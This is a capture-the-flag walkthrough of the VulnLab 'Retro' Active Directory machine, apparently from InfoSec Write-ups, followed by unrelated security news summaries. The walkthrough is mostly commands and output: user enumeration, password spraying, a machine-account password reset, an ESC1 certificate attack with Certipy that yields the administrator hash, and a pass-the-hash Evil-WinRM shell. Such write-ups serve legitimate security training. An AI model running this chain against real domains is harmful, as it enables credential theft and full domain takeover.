AdminSMB 10.10.124.218 445 DC C$ Default shareSMB 10.10.124.218 445 DC IPC$ READ Remote IPCSMB 10.10.124.218 445 DC NETLOGON READ Logon server shareSMB 10.10.124.218 445 DC Notes READ SMB 10.10.124.218 445 DC SYSVOL READ Logon server shareSMB 10.10.124.218 445 DC Trainees READ SPIDER_PLUS 10.10.124.218 445 DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.124.218.json".SPIDER_PLUS 10.10.124.218 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Notes, SYSVOL, Trainees)SPIDER_PLUS 10.10.124.218 445 DC [*] SMB Readable Shares: 5 (IPC$, NETLOGON, Notes, SYSVOL, Trainees)SPIDER_PLUS 10.10.124.218 445 DC [*] SMB Filtered Shares: 1SPIDER_PLUS 10.10.124.218 445 DC [*] Total folders found: 19SPIDER_PLUS 10.10.124.218 445 DC [*] Total files found: 7SPIDER_PLUS 10.10.124.218 445 DC [*] File size average: 1.24 KBSPIDER_PLUS 10.10.124.218 445 DC [*] File size min: 22 BSPIDER_PLUS 10.10.124.218 445 DC [*] File size max: 3.68 KBDo you remember the users we found during the RID cycling attack? It’s time to spray some passwords using NetExec! But wait — I almost missed an important step. Before that, we need to validate the users using Kerberos with the Kerbrute tool.┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# kerbrute userenum -d retro.vl users.txt --dc 10.10.124.218 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __//_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 02/17/25 - Ronnie Flathers @ropnop2025/02/17 21:22:22 > Using KDC(s):2025/02/17 21:22:22 > 10.10.124.218:882025/02/17 21:22:22 > [+] VALID USERNAME: Trainee@retro.vl2025/02/17 21:22:22 > [+] VALID USERNAME: Administrator@retro.vl2025/02/17 21:22:22 > Done! Tested 3 usernames (2 valid) in 0.560 seconds ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# kerbrute userenum -d retro.vl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.124.218 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __//_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 02/17/25 - Ronnie Flathers @ropnop2025/02/17 21:20:50 > Using KDC(s):2025/02/17 21:20:50 > 10.10.124.218:882025/02/17 21:21:25 > [+] VALID USERNAME: guest@retro.vl2025/02/17 21:22:39 > [+] VALID USERNAME: administrator@retro.vl2025/02/17 21:39:55 > [+] VALID USERNAME: Guest@retro.vl2025/02/17 21:39:59 > [+] VALID USERNAME: Administrator@retro.vlHere, I’m checking with two wordlists — one containing the users we initially found and another with common usernames from the SecLists wordlist. This is crucial because, in some scenarios, you might not have any discovered users to work with.I usually move on to pentesting after this step, but just a heads-up — you should also test for Kerberoasting and ASREPRoasting attacks at this stage. Just wanted to throw that out there!It’s time to start password spraying! 🔥 You can use Kerbrute for this, but as I’ve said before, I love playing with NetExec!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u clean_users.txt -p clean_users.txt SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\jburley:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:Administrator STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\jburley:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:Guest STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\jburley:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:krbtgt STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\trainee:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\BANKING$:DC$ STATUS_LOGON_FAILURE🈁🈁🈁🈁🈁🈁🈁🈁🈁🈁SMB 10.10.124.218 445 DC [-] retro.vl\jburley:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\tblack:DC$ STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Administrator:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\Guest:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\krbtgt:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [-] retro.vl\DC$:trainee STATUS_LOGON_FAILURESMB 10.10.124.218 445 DC [+] retro.vl\trainee:trainee Nothing interesting here since we already knew the trainee user could log in with the “trainee” password.But there’s something interesting in the output of impacket-lookupsids—did you notice that? 🤔 There’s a computer account: Banking$, and its password is the same as its name, which we also confirmed during the password spraying. Note: Whenever you discover a new user during enumeration, always add it to your wordlist for spraying laterSo, it’s a valid user with a valid password, but the error we got during spraying indicates that the password needs to be changed. To fix this, we need to modify the /etc/krb5.conf file and use the kpasswd tool to update the password.┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# cat /etc/krb5.conf [libdefaults] default_realm = RETRO.VL dns_lookup_realm = false dns_lookup_kdc = false forwardable = true ticket_lifetime = 24h renew_lifetime = 7d[realms] RETRO.VL = { kdc = 10.10.124.218 admin_server = 10.10.124.218 default_domain = RETRO.VL }[domain_realm] .retro.vl = RETRO.VL retro.vl = RETRO.VL┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# kpasswd BANKING$Password for BANKING$@RETRO.VL: Enter new password: Enter it again: Password changed. ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# banking1234 Checking for Validation of the Password Just Set┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc smb 10.10.124.218 -u ''BANKING$'' -p ''banking1234'' SMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)SMB 10.10.124.218 445 DC [+] retro.vl\BANKING$:banking1234 AD CS as Part of the Things You Need to CheckI will use the NetExec module for this first, then follow up with Certipy by Oliver Lyak a fantastic tool for all AD CS attacks — for additional AD CS scanning And Exploitation.┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# nxc ldap 10.10.124.218 -u trainee -p ''trainee'' -M adcsSMB 10.10.124.218 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)LDAP 10.10.124.218 389 DC [+] retro.vl\trainee:trainee ADCS 10.10.124.218 389 DC [*] Starting LDAP search with search filter ''(objectClass=pKIEnrollmentService)''ADCS 10.10.124.218 389 DC Found PKI Enrollment Server: DC.retro.vlADCS 10.10.124.218 389 DC Found CN: retro-DC-CA┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# certipy find -u trainee -p ''trainee'' -vulnerable -stdout -dc-ip 10.10.124.218 Certipy v4.8.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Trying to get CA configuration for ''retro-DC-CA'' via CSRA[!] Got error while trying to get CA configuration for ''retro-DC-CA'' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.[*] Trying to get CA configuration for ''retro-DC-CA'' via RRP[!] Failed to connect to remote registry. Service should be starting now. Trying again...[*] Got CA configuration for ''retro-DC-CA''[*] Enumeration output:Certificate Authorities 0 CA Name : retro-DC-CA DNS Name : DC.retro.vl Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85 Certificate Validity Start : 2023-07-23 21:03:51+00:00 Certificate Validity End : 2028-07-23 21:13:50+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : RETRO.VL\Administrators Access Rights ManageCertificates : RETRO.VL\Administrators RETRO.VL\Domain Admins RETRO.VL\Enterprise Admins ManageCa : RETRO.VL\Administrators RETRO.VL\Domain Admins RETRO.VL\Enterprise Admins Enroll : RETRO.VL\Authenticated UsersCertificate Templates 0 Template Name : RetroClients Display Name : Retro Clients Certificate Authorities : retro-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : 16842752 Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 4096 Permissions Enrollment Permissions Enrollment Rights : RETRO.VL\Domain Admins RETRO.VL\Domain Computers RETRO.VL\Enterprise Admins Object Control Permissions Owner : RETRO.VL\Administrator Write Owner Principals : RETRO.VL\Domain Admins RETRO.VL\Enterprise Admins RETRO.VL\Administrator Write Dacl Principals : RETRO.VL\Domain Admins RETRO.VL\Enterprise Admins RETRO.VL\Administrator Write Property Principals : RETRO.VL\Domain Admins RETRO.VL\Enterprise Admins RETRO.VL\Administrator [!] Vulnerabilities ESC1 : ''RETRO.VL\\Domain Computers'' can enroll, enrollee supplies subject and template allows client authenticationNow that we know it’s vulnerable to ESC1, it’s time to dig deeper and exploit it!┌──(root㉿kali)-[/home/kali/VulnLab/retero_1] └─# certipy req -u ''@retro.vl">banking$''@retro.vl -p ''banking1234'' -c ''retro-DC-CA'' -target ''dc.retro.vl'' -template ''RetroClients'' -upn ''administrator'' -key-size 4096 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve ''dc.retro.vl'' at ''8.8.8.8'' [+] Trying to resolve ''RETRO.VL'' at ''8.8.8.8'' [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.124.218[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.124.218[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 9 [*] Got certificate with UPN ''administrator'' [*] Certificate has no object SID [*] Saved certificate and private key to ''administrator.pfx'' ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# certipy auth -pfx ''administrator.pfx'' -username ''administrator'' -domain ''retro.vl'' -dc-ip 10.10.124.218Certipy v4.8.2 - by Oliver Lyak (ly4k)[*] Using principal: administrator@retro.vl[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to ''administrator.ccache''[*] Trying to retrieve NT hash for ''administrator''[*] Got hash for ''administrator@retro.vl'': aad3b435b51404eeaad3b435b51404ee:252fac7066d9------------- ┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]└─# evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d9-------- Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamiretro\administrator*Evil-WinRM* PS C:\Users\Administrator\Documents> ls*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop*Evil-WinRM* PS C:\Users\Administrator\desktop> ls Directory: C:\Users\Administrator\desktopMode LastWriteTime Length Name---- ------------- ------ -----a---- 7/25/2023 12:38 PM 36 root.txt*Evil-WinRM* PS C:\Users\Administrator\desktop> cat root.txtVL{8-----------------------------*Evil-WinRM* PS C:\Users\Administrator\desktop>Exploiting ESC1 in AD CSAfter confirming that the AD CS instance is vulnerable to ESC1 (Enterprise CA Security Issue 1), we move on to exploitation using Certipy. This attack abuses misconfigured certificate templates that allow low-privileged users or machine accounts to request certificates with privileged user UPNs (User Principal Names). These certificates can then be used for authentication and privilege escalation.Step 1: Requesting a Certificate as AdministratorWe use the certipy req command to request a certificate as the Administrator user while authenticating with the compromised Banking$ machine account.certipy req -u ''banking$''@retro.vl -p ''banking1234'' -c ''retro-DC-CA'' -target ''dc.retro.vl'' -template ''RetroClients'' -upn ''administrator'' -key-size 4096 -debug-u ''banking$''@retro.vl -p ''banking1234'': We authenticate as the Banking$ machine account.-c ''retro-DC-CA'' -target ''dc.retro.vl'': Specifies the Certificate Authority (CA) and domain controller.-template ''RetroClients'': Requests a certificate using the vulnerable template.-upn ''administrator'': Sets the UPN to Administrator, essentially tricking the CA into issuing a certificate for a highly privileged account.-key-size 4096: Generates a strong RSA key.If the template is misconfigured and allows us to specify arbitrary UPNs, we successfully obtain a certificate for Administrator.The output confirms that the certificate was issued and saved as administrator.pfx.Step 2: Using the Certificate for AuthenticationWith the certificate in hand, we use Certipy auth to authenticate as Administrator and retrieve their NTLM hash.certipy auth -pfx ''administrator.pfx'' -username ''administrator'' -domain ''retro.vl'' -dc-ip 10.10.124.218-pfx ''administrator.pfx'': Uses the obtained certificate for authentication.-username ''administrator'' -domain ''retro.vl'': Specifies the target user and domain.-dc-ip 10.10.124.218: Specifies the domain controller’s IP.The output confirms that we successfully retrieved a TGT (Ticket Granting Ticket) and the NTLM hash of the Administrator account:aad3b435b51404eeaad3b435b51404ee:252fac706----------Step 3: Getting a Shell as AdministratorWith the Administrator NTLM hash, we use Evil-WinRM to get a fully privileged shell on the domain controller.evil-winrm -i dc.retro.vl -u administrator -H 252fac7066----------------And just like that… we’re in! 🎉*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamiretro\administratorNavigating to the desktop and reading the root.txt flag confirms full domain compromise!VL{8b-----------------Final ThoughtsThis machine was a great example of how misconfigured AD CS templates can lead to full domain takeover. By abusing ESC1, we were able to escalate from a low-privileged machine account (Banking$) to Administrator—without even needing to crack any hashes!🔹 Key Takeaways: ✅ Always check for AD CS misconfigurations. ✅ ESC1 allows for privilege escalation by requesting certificates with privileged UPNs. ✅ Certipy is an excellent tool for AD CS enumeration and exploitation.And that’s another VulnLab machine pwned! 🔥ReferencesIf you want references for this attack, check out our blog post on it!Escape Unveiled: Active Directory ADCS Exploit WalkthroughDo You Wanna Chat with Maverick?🥂Don’t forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! i love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀Retro was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

As a chess player, I have faced all kinds of pain — blundering my queen, losing to a 900-rated player, and watching my online chess rating…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

🚨👉 Free Link: click here 👈🚨Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Cybersecurity advice is everywhere. We’re constantly reminded to update our passwords, enable two-factor authentication, and avoid clicking suspicious links. Yet, beneath these practical steps lie deeper cyber hygiene habits that, despite their importance, are frequently overlooked. These underlying mindsets and systemic behaviors shape the security landscape. 1. Treating digital security as a habit, not a checklist Most cybersecurity recommendations are framed as tasks: update software, change passwords, verify emails. But proper cyber hygiene isn’t about … More → The post Cyber hygiene habits that many still ignore appeared first on Help Net Security.

by Help Net Security

The campaign heavily uses Dropbox folders and PowerShell scripts to evade detection and quickly scrapped infrastructure components after researchers began poking around.

by Dark Reading

A new report reveals how cheap Infostealer malware is exposing US military and defense data, putting national security at risk. Hackers exploit human error to gain access.

by Hackread

Juniper Networks has addressed a critical vulnerability, tracked as CVE-2025-21589, impacting the Session Smart Router. Juniper Networks addressed a critical authentication bypass vulnerability, tracked as CVE-2025-21589 (CVSS score of 9.8), affecting its Session Smart Router product. “An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based […]

by Security Affairs

Attackers are using patched bugs to potentially gain unfettered access to an organization''s Windows environment under certain conditions.

by Dark Reading

Winnti once used a variety of malware but is now focused on SQL vulnerabilities and obfuscation, updated encryption, and new evasion methods to gain access.

by Dark Reading

The settlement with Health Net Federal Services is the latest penalty levied on a federal contractor as part of a 2021 initiative to root out cyber-related fraud.

by The Record

by Dark Reading

by Dark Reading

At least eight ongoing lawsuits related to the so-called Department of Government Efficiency’s alleged access to sensitive data hinge on the Watergate-inspired Privacy Act of 1974. But it’s not airtight.

by WIRED Security News

Two security vulnerabilities have been discovered in the OpenSSH secure networking utility suite that, if successfully exploited, could result in an active machine-in-the-middle (MitM) and a denial-of-service (DoS) attack, respectively, under certain conditions. The vulnerabilities, detailed by the Qualys Threat Research Unit (TRU), are listed below - CVE-2025-26465 (CVSS score: 6.8) - The

by The Hacker News

A flea market buyer found medical information about hundreds of patients on second hand decommissioned hard drives.

by Malwarebytes Labs

In a report released on Monday, threat intelligence specialists at Microsoft said that they have discovered the new XCSSET strain in limited attacks. XCSSET, first spotted in the wild in August 2020, spreads by infecting Xcode projects, which developers use to create apps for Apple devices.

by The Record

The Chinese state-sponsored threat actor known as Mustang Panda has been observed employing a novel technique to evade detection and maintain control over infected systems. This involves the use of a legitimate Microsoft Windows utility called Microsoft Application Virtualization Injector (MAVInject.exe) to inject the threat actor''s malicious payload into an external process, waitfor.exe,

by The Hacker News

Open-source intelligence (OSINT) is gaining more attention due to the massive volume of digital data generated daily by computing devices, Internet of Things (IoT) sensors, and people''s interactions on social media platforms.

by Barracuda

Web applications are a key part of the modern digital experience, but that makes them high-value targets for cybercriminals. Protecting against vulnerabilities requires a proactive approach.

by Legit Security

In a statistical report published in September 2024 by the Federal Bureau of Investigation (FBI), it was revealed that more than US$55 billion was lost to business email compromise (BEC) attacks between October 2013 and December 2023. This profitability drives attackers to further their techniques and adapt to security filters.

by SpiderLabs Blog

Discover how AI-led investigations unify IT and OT security, reducing alert fatigue and accelerating alert investigation in industrial environments.

by Darktrace

Turning on Private DNS Mode on Android ensures your searches and DNS queries are encrypted, keeping them safe from prying eyes. Here''s what else you should know.

by ZDNET Security

Microsoft is warning the modular and potentially wormable Apple-focused infostealer boasts new capabilities for obfuscation, persistence, and infection, and could lead to a supply chain attack.

by Dark Reading

Carding -- the underground business of stealing, selling and swiping stolen payment card data -- has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.

by Krebs on Security

Cybersecurity researchers are alerting to a new campaign that leverages web injects to deliver a new Apple macOS malware known as FrigidStealer. The activity has been attributed to a previously undocumented threat actor known as TA2727, with the information stealers for other platforms such as Windows (Lumma Stealer or DeerStealer) and Android (Marcher). TA2727 is a ""threat actor that uses fake

by The Hacker News

The VC firm has $90 billion in assets under management and invested in several unicorn cybersecurity startups © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Guardrail specialist releases new products to aid the development and use of secure gen-AI apps. The post Pangea Launches AI Guard and Prompt Guard to Combat Gen-AI Security Risks appeared first on SecurityWeek.

by SecurityWeek

Security consultancy Quarkslab said that the flaw could allow threat actors to bypass USB lockouts.

by SC Media

Two critical OpenSSH vulnerabilities discovered! Qualys TRU finds client and server flaws (CVE-2025-26465 & CVE-2025-26466) enabling MITM and…

by Hackread

WinRAR 7.10 was released yesterday with numerous features, such as larger memory pages, a dark mode, and the ability to fine-tune how Windows Mark-of-the-Web flags are propagated when extracting files. [...]

by BleepingComputer

Phone hacking technologies are becoming more and more inconspicuous. That''s why you should treat your phone like a computer, according to this cybersecurity expert.

by ZDNET Security

The National Assembly, Ecuador''s unicameral legislature, says it was able to ""identify and counteract"" attempts by malicious hackers to breach sensitive systems.

by The Record

Is AI really reshaping the cyber threat landscape, or is the constant drumbeat of hype drowning out actual, more tangible, real-world dangers? According to Picus Labs’ Red Report 2025 which analyzed over one million malware samples, there''s been no significant surge, so far, in AI-driven attacks. Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a

by The Hacker News

Juniper Networks has released security updates to address a critical security flaw impacting Session Smart Router, Session Smart Conductor, and WAN Assurance Router products that could be exploited to hijack control of susceptible devices. Tracked as CVE-2025-21589, the vulnerability carries a CVSS v3.1 score of 9.8 and a CVS v4 score of 9.3. ""An Authentication Bypass Using an Alternate Path or

by The Hacker News

South Korea just banned DeepSeek from the Google Play and the App Store. Several other countries have also taken action against the Chinese startup''s chatbot.

by ZDNET Security

Researchers found that PirateFI was never designed to be a real game, but a vehicle to infect gamers with malware and steal their passwords with an infostealer called Vidar. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

If the VerifyHostKeyDNS option is activated, an attacker could impersonate a server to hijack SSH sessions.

by SC Media

A new variant of Snake Keylogger, a credential-stealing malware, has been detected in over 280 million infection attempts, highlighting its widespread impact. The malware’s latest resurgence, which was observed by Fortinet, primarily impacts users in China, Turkey, Indonesia, Taiwan, and Spain. It uses phishing emails to infiltrate systems and steal credentials from browsers like Chrome, … The post New Snake Keylogger Variant Launches 280 Million Attacks appeared first on CyberInsider.

by Cyber Insider

by SC Media

San Francisco startup secures $8.5 million in seed funding led by Valley Capital Partners to tackle browser-based malware attacks. The post MirrorTab Raises $8.5M Seed Round to Take on Browser-Based Attacks appeared first on SecurityWeek.

by SecurityWeek

Media conglomerate Lee Enterprises told regulators on Friday that hackers had stolen files and encrypted “critical applications” as part of an incident that impacted the operations of dozens of newspapers nationwide.

by The Record

Cybersecurity professionals may be concerned about the constantly shifting threat landscape. From the increased use of artificial intelligence (AI) by malicious actors to the expanding attack surface, cybersecurity risks evolve, and defenders need to mitigate them. Despite a period of cybersecurity budget growth between 2021 and 2022, this growth has slowed in the last few years, meaning that cybersecurity leaders need to carefully consider how their purchases improve their current security and compliance posture. To … More → The post 6 considerations for 2025 cybersecurity investment decisions appeared first on Help Net Security.

by Help Net Security

A large-scale malware campaign dubbed ""StaryDobry"" has been targeting gamers worldwide with trojanized versions of cracked games such as Garry''s Mod, BeamNG.drive, and Dyson Sphere Program. [...]

by BleepingComputer

As AI redefines the scale of "fair use" by rapidly ingesting and repurposing vast amounts of public data, concerns over privacy, intellectual property, and ethical boundaries grow.

by ITPro Today

The New Snake Keylogger variant targets Windows users via phishing emails, using AutoIt for stealth. Learn how it…

by Hackread

BlackLock is on track to become the most active ransomware-as-a-service (RaaS) outfit in 2025, according to ReliaQuest. Its success is primarily due to their unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and their aggressive recruiting of traffers (individuals that steer victims to harmful content/software), initial access brokers (IABs), and affiliates. What is BlackLock? BlackLock (aka El Dorado or Eldorado) cropped up in early 2024. It uses custom-built ransomware that can … More → The post BlackLock ransomware onslaught: What to expect and how to fight it appeared first on Help Net Security.

by Help Net Security

China-linked threat actor Winnti targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 as part of a campaign dubbed RevivalStone. Researchers from cybersecurity firm LAC uncovered a new cyberespionage campaign, tracked as RevivalStone, carried out by the China-linked APT group Winnti in March 2024. Threat actors targeted Japanese companies in the manufacturing, […]

by Security Affairs

A new report from Gen highlights a sharp rise in online threats, capping off a record-breaking 2024. Between October and December alone, 2.55 billion cyber threats were blocked – an astonishing rate of 321 per second. The risk of encountering a threat climbed to 27.7% in Q4, with social engineering attacks accounting for 86% of all blocked threats. This underscores the increasingly sophisticated psychological tactics cybercriminals are using to deceive victims. “We’re continuing to see … More → The post Cybercriminals shift focus to social media as attacks reach historic highs appeared first on Help Net Security.

by Help Net Security

New York-based venture capital and private equity firm Insight Partners has disclosed that its systems were breached in January following a social engineering attack. [...]

by BleepingComputer

The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41

by The Hacker News

Unit21 launched its new scams solution that helps financial institutions and fintechs detect and stop scams before they cause financial harm. Using AI automation, the new solution can be integrated into a fraud team’s workflow to accelerate investigations and response times while also incorporating IP insights and consortium signals to prevent and detect scams before they hit consumer financial accounts. Advancements in technology have allowed criminals to scam consumers and businesses at unprecedented speed and … More → The post Unit21 empowers financial institutions to detect and stop scams appeared first on Help Net Security.

by Help Net Security

Microsoft warns Apple developers about a new XCSSET malware variant targeting macOS, posing security risks through stealthy infections…

by Hackread

Keeper Security has today announced the next generation of its Privileged Access Management (PAM) platform, KeeperPAM®. The latest update introduces a fully cloud-native solution that seamlessly integrates all privileged access management processes into Keeper’s encrypted vault. This unified approach ensures maximum security, simplicity and scalability, enabling organisations to manage privileged credentials and secrets securely within […] The post Keeper Security Launches Upgraded KeeperPAM appeared first on IT Security Guru.

by IT Security Guru

Attackers stole data from U.S. military and Lockheed Martin, Boeing and Honeywell employees for as little as $10 per computer.

by SC Media

Microsoft once again reminded IT administrators that driver synchronization in Windows Server Update Services (WSUS) will be deprecated on April 18, just 60 days from now. [...]

by BleepingComputer

Boomi unveiled its API Management (APIM) solution, delivering cloud-scale APIM alongside integration and automation, data management, and AI capabilities as part of the Boomi Enterprise Platform. Comprised of Boomi’s existing API Management offering along with assets recently acquired from both Cloud Software Group and APIIDA, Boomi API Management enables enterprises to conquer API chaos, power agentic AI, and unleash their business potential – transforming APIs into strategic drivers of growth. According to IDC, organizations with … More → The post Boomi API Management helps enterprises tackle API sprawl appeared first on Help Net Security.

by Help Net Security

Elastic Security Labs has uncovered a sophisticated cyber-espionage campaign, designated as REF7707, targeting the foreign ministry of a South American nation and linked to other compromises in Southeast Asia. The post From South America to Southeast Asia: The Fragile Web of REF7707 appeared first on ZENDATA Cybersecurity.

by Zendata

Overview The Indian Computer Emergency Response Team (CERT-In) has issued a critical security advisory (CIVN-2025-0025) detailing multiple vulnerabilities across various Adobe products. These security flaws pose significant risks, including unauthorized code execution, privilege escalation, security bypass, and denial-of-service (DoS) attacks. Users and administrators of affected Adobe software are urged to apply security updates immediately to mitigate these risks. Affected Software The vulnerabilities impact multiple Adobe products across different versions. The affected software includes: Adobe InDesign InDesign 1D20.0 and earlier versions InDesign 1D19.5.1 and earlier versions Adobe Commerce Adobe Commerce 2.4.4-p11 and earlier versions Adobe Commerce B2B 1.3.3-p11 and earlier versions Magento Open Source 2.4.4-p11 and earlier versions Adobe Substance 3D Stager Substance 3D Stager 3.1.0 and earlier versions Adobe InCopy InCopy 20.0 and earlier versions InCopy 19.5.1 and earlier versions Adobe Illustrator Illustrator 2025 29.1 and earlier versions Illustrator 2024 28.7.3 and earlier versions Adobe Substance 3D Designer Substance 3D Designer 14.0.2 and earlier versions Adobe Photoshop Elements Photoshop Elements 2025.0 (Builds: 20240918.PSE.cae27345, 20240918.PSE.d3263bae) Risk and Impact Assessment Risk Assessment These vulnerabilities are classified as Critical, making them high-risk threats that can lead to unauthorized access to sensitive data, system instability, and potential compromise of critical operations. Impact Assessment Arbitrary Code Execution: Attackers can exploit the vulnerabilities to run malicious code on affected systems, potentially gaining full control over compromised machines. Privilege Escalation: Unauthorized users may gain elevated privileges, allowing them to modify system settings and access restricted resources. Security Feature Bypass: Malicious actors can circumvent security controls, enabling further exploitation of the affected systems. Denial of Service (DoS): Successful exploitation can result in system crashes or unavailability, disrupting operations and productivity. Technical Details The vulnerabilities stem from multiple security flaws, including: Out-of-Bounds Write: Writing data outside the allocated buffer, leading to potential code execution. Integer Underflow (Wraparound): Arithmetic errors causing improper memory operations. Heap-Based Buffer Overflow: Exploitation can lead to memory corruption and code execution. Out-of-Bounds Read: Reading data beyond allocated memory, potentially exposing 